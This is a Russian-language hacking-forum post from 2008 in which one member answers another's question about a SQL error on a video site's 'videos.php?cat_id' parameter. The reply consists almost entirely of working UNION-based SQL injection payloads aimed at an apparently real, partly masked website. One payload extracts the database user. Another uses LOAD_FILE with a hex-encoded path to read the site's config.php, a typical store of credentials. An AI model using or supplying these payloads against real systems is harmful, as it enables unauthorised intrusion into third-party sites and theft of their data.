Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #3  
Старый 15.09.2008, 00:32
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
Провел на форуме:
1050637

Репутация: 27
По умолчанию
Цитата:
Сообщение от Кубик Рубик  
На запрос videos.php?cat_id=28' Отвечает:
Notice: Undefined index: 28\' in /var/www/html/site/videos.php on line 103 и еще пишет это: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3

Что можно предпринять?

videos.php?cat_id=28 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
{4} вывод.
_http://www.****.**/videos.php?cat_id=28 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696 E6A626567696E,User(),0x7873716C696E6A656E64),0x71) ,0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
и там еще кусочек файла прочитать можно
_http://www.****.**/videos.php?cat_id=28 UNION SELECT 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696 E6A626567696E,LOAD_FILE(0x2F7661722F7777772F68746D 6C2F736974652F636F6E662F636F6E6669672E706870),0x78 73716C696E6A656E64),0x71),0x71),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19/*

все благодаря SIPT
думаю я сайт угадал)
 
Ответить с цитированием